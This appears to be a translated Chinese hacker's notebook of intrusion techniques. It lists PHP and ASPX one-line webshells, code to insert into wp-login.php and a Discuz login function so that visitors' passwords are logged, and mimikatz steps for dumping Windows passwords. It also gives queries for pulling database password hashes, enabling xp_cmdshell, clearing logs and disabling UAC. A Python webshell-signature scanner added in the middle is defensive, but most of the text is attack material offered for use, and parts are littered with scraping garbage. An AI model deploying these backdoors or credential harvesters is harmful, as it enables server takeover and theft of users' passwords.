error_reporting(E_ALL);
$i = 0;
while($i<32) {
    $i = $i+1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
    unlink($filename);
}
httprint: collects operating system fingerprints
Scan all ports of 192.168.1.100:
nmap -PN -sT -sV -p0-65535 192.168.1.100
host -t ns www.owasp.org    identifies the name servers and obtains DNS information
host -l www.owasp.org ns1.secure.net    attempts a zone transfer for owasp.org
Netcraft's DNS search service: http://searchdns.netcraft.com/?host
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)

MSN search: http://search.msn.com    syntax: "ip:x.x.x.x" (without the quotes)
Webhosting info: http://whois.webhosting.info/    syntax: http://whois.webhosting.info/x.x.x.x
DNSstuff: http://www.dnsstuff.com/ (multiple services available)

http://net-square.com/msnpawn/index.shtml (requires installation)

tomDNS: http://www.tomdns.net/ (some services are still private)
SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)

set names gb2312
Importing a database showed the error "Data too long for column 'username' at row 1". The cause is that Chinese characters were not supported.

Changing the MySQL password:
UPDATE mysql.user SET password=PASSWORD("newpass") WHERE user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
Advanced PHP one-line trojan backdoors

Many advanced PHP one-line trojans were found during intrusions. They are recorded here so they can later be searched for and removed by keyword.

1.

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$hh("/[discuz]/e",$_POST['h'],"Access");

// Caidao (China Chopper) one-liner

2.

$filename=$_GET['xbid'];

include ($filename);

// dangerous include: compiles any file as PHP and runs it

3.
$reg="c"."o"."p"."y";

$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);

// renames (copies) any file

4.

$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");

// Caidao (China Chopper) one-liner

5. include ($uid);

// dangerous include: compiles any file as PHP and runs it, via POST

// one-liner embedded in a GIF

6. Typical one-liners

Backdoor code
<?php eval_r($_POST[sb])?>
Code
<?php @eval_r($_POST[sb])?>
// error-tolerant version
Code
<?php assert($_POST[sb]);?>
// execute PHP statements using the expert mode of the lanker one-liner client
Code
<?$_POST['sa']($_POST['sb']);?>
Code
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
Code
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// for this one, when configuring the connection in the Caidao one-liner client, enter the following in the "configuration" field
Code
<O>h=@eval_r($_POST[c]);</O>
Code
<script language="php">@eval_r($_POST[sb])</script>
// a one-liner that bypasses a restriction on <?
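The stated purpose of the list above is to search for these one-liners by keyword later. The following Python script is an added example, not code from the original post: it turns the patterns shown in the list (function names built from single-character strings, preg_replace with the /e modifier, eval/assert/include fed from request data, request data used as a function name, the <script language="php"> tag) into regex signatures and runs them over constructed samples, namely the one-liners above plus one benign snippet. SIGNATURES, scan_source and signature_names are names chosen for this example; the regexes are heuristics meant to surface lines for review and will produce some false positives on real code (the include_variable signature in particular).

```python
import re
from typing import List, Tuple

# Heuristic signatures derived from the one-liners listed in the post above.
# Each regex is applied line by line; a hit means "review this line", not proof.
SIGNATURES = {
    # "p"."r"."e"."g"...: a function name assembled from one-character strings
    "concatenated_name": re.compile(r'(?:"[A-Za-z_]"\s*\.\s*){3,}"[A-Za-z_]"'),
    # preg_replace() with the /e modifier evaluates the replacement as PHP
    "preg_replace_e": re.compile(
        r'preg_replace\s*\(\s*["\']/[^"\']*/[a-z]*e[a-z]*["\']', re.I),
    # a variable holding an unknown function, called with a /e pattern ($hh(...))
    "variable_call_e": re.compile(
        r'\$\w+\s*\(\s*["\']/[^"\']*/[a-z]*e[a-z]*["\']', re.I),
    # eval()/assert() fed straight from request data (the post renders eval as eval_r)
    "eval_request": re.compile(
        r'\b(?:eval(?:_r)?|assert)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b', re.I),
    # "${@eval(...)}": code executed while a double-quoted string is interpolated
    "eval_in_string": re.compile(r'\$\{\s*@?eval\s*\(', re.I),
    # $_POST['a']($_POST['b']): request data used as the function name
    "variable_function": re.compile(r'\$_(?:POST|GET|REQUEST)\s*\[[^\]]*\]\s*\('),
    # include/require of a variable; the variable may come from the request
    "include_variable": re.compile(
        r'\b(?:include|require)(?:_once)?\s*\(?\s*\$\w+', re.I),
    # <script language="php"> runs PHP without the <? tag that simple filters look for
    "script_php_tag": re.compile(r'<script\s+language\s*=\s*["\']php["\']', re.I),
}


def scan_source(source: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, signature_name, stripped_line) for every hit."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in SIGNATURES.items():
            if pattern.search(line):
                hits.append((lineno, name, line.strip()))
    return hits


def signature_names(source: str) -> List[str]:
    """Sorted list of the distinct signatures that fire on a source text."""
    return sorted({name for _, name, _ in scan_source(source)})


# Constructed samples: the one-liners from the post above plus a benign snippet.
SAMPLES = {
    "concat_preg": '$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";\n'
                   '$hh("/[discuz]/e",$_POST[\'h\'],"Access");',
    "include_get": "$filename=$_GET['xbid'];\ninclude ($filename);",
    "copy_upload": '$reg="c"."o"."p"."y";\n'
                   '$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);',
    "eval_post": "<?php @eval_r($_POST[sb])?>",
    "assert_post": "<?php assert($_POST[sb]);?>",
    "var_func": "<?$_POST['sa']($_POST['sb']);?>",
    "preg_e": '<?php\n@preg_replace("/[email]/e",$_POST[\'h\'],"error");\n?>',
    "script_tag": '<script language="php">@eval_r($_POST[sb])</script>',
    "string_eval": '$telok = "0${@eval($_POST[xxoo])}";',
    # benign: a normal regex, a static include and escaped output
    "benign": "<?php\n$r = preg_replace('/\\s+/', ' ', $s);\n"
              "include 'config.php';\necho htmlspecialchars($_POST['name']);\n?>",
}

if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print("%-12s -> %s" % (label, signature_names(src) or "clean"))
```

Run against a real tree, the same scan_source() would be applied to every .php file (and, given item 5 above, to image uploads as well), with hits reviewed by hand rather than deleted automatically.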
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage:
1. Go to the tools directory: psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. The wdigest entry is the password
7. Exit with exit; do not simply close the window, or the system will crash.
http://www.monyer.com/demo/monyerjs/    fairly comprehensive JS decoding site

Automatically check for high-risk system patches
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

One-line aspx backdoor that gets past Safedog
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
Logging WordPress login passwords from a webshell
Logging WordPress login passwords from a webshell to make further social engineering easier
Add the following at line 539 of wp-login.php:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen('pwd.txt',"a+"),$txt);
}
When action=login the password-logging code is triggered; you can of course also place the code in the default branch of the switch...case statement.
Just search for case 'login'
and insert it directly below; the recorded passwords are written to pwd.txt.
Actually, modifying wp-login.php is not a good approach; it is easily discovered. There are other methods; this is noted for the record.
Bypassing Safedog with the IIS6 file parsing vulnerability:
antian365.asp;antian365.jpg
" p! K8 B0 Q- Q7 q1 W各种类型数据库抓HASH破解最高权限密码!4 D3 f/ Q1 x4 F; q2 D- ]3 |
1.sql server2000
3 h$ E) s# g0 s+ z0 W" HSELECT password from master.dbo.sysxlogins where name='sa'
5 J: t- i2 t9 Y; i* l0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341+ x0 I9 `: J$ F% d
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
. n- D4 B. G: u$ I+ E1 }3 \% D0 T+ f& b N- q- l; u" P9 |
0×0100- constant header8 i7 v, z6 n5 }( P, t
34767D5C- salt4 [: B! U; }6 g$ }) b6 S, i
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
- B: y) ?6 c! }# q2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
+ I L, d1 t: i3 U; X" p+ V4 D8 Tcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash3 `5 m4 q# |6 P3 Q) i0 _, D. j7 l0 w
SQL server 2005:-
( \* K/ L0 `7 G9 E: RSELECT password_hash FROM sys.sql_logins where name='sa'. s$ \; S6 c# C0 L6 N# n
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
6 T6 C* }" p$ v. |9 D% W0×0100- constant header6 @8 E$ }2 f `0 _% ]
993BF231-salt* e& o! [4 [; U# r# P# j4 b
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
; R- W' i) d( W- jcrack case sensitive hash in cain, try brute force and dictionary based attacks.
, D/ D7 ]6 D; j. [$ ]) f
& K% r8 ?( f4 _- ?3 v- ]/ l$ mupdate:- following bernardo’s comments:-
u; D% W5 U# }' `: }use function fn_varbintohexstr() to cast password in a hex string.
- D8 U6 a9 X$ Q* \e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins& P- N! z4 m! t! {' j. ^
" p1 m j0 ]( e3 _: j( w* S9 r8 Z. L$ @
MySQL:

In MySQL you can generate hashes internally using the password(), md5(), or sha1() functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

* MySQL < 4.1

mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+

* MySQL >= 4.1
mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+
Select user, password from mysql.user
The hashes can be cracked in 'Cain and Abel'.

Postgres:
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql").
select usename, passwd from pg_shadow;
 usename  | passwd
----------+-------------------------------------
 testuser | md5fabb6d7172aadfda4753bf0507ed4396
Use mdcrack to crack these hashes:
$ wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:
select name, password, spare4 from sys.user$
The hashes could be cracked using 'Cain and Abel' or thc-orakelcrackert11g.
More on Oracle later, I am a bit bored....
Enabling xp_cmdshell in SQL Server 2005/2008:
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO

Clearing SQL Server 2008 logs; always back up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete here:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

For versions before SQL Server 2008:
SQL Server 2005:
Delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
Clear the corresponding entries under the registry key HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.

This post was last edited by simeon on 2013-1-3 09:51
Changing file permissions in Windows 2008
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
Step one: check whether the right-click menu has a "管理员取得所有权" (Take ownership as administrator) entry; if it does not:
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

Import the Win7 right-click "Take ownership as administrator" .reg file
Step two: search the C:\Windows directory for "notepad.exe"; you should find four "notepad.exe" and four "notepad.exe.mui" files.
1. The "notepad.exe" at C:\Windows does not need replacing
2. The "notepad.exe" at C:\Windows\System32 does not need replacing
3. Ignore the four "notepad.exe.mui" files
4. Mainly replace the "notepad.exe" in the two folders C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a
To replace them, first take administrator ownership of these two folders, then rename "Notepad2.exe" to "notepad.exe" and copy it into both folders.
After replacing, go back to the desktop, create a new txt file and open it to see whether it has changed.
Disabling the security policy in Windows 2008:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Modify client.php in the uc_client directory: below
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
insert the following code; csslog.php is then generated automatically in the site's ./data/cache/ directory.
You can add a view.php in the ipdata directory to view the records; password: falw
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);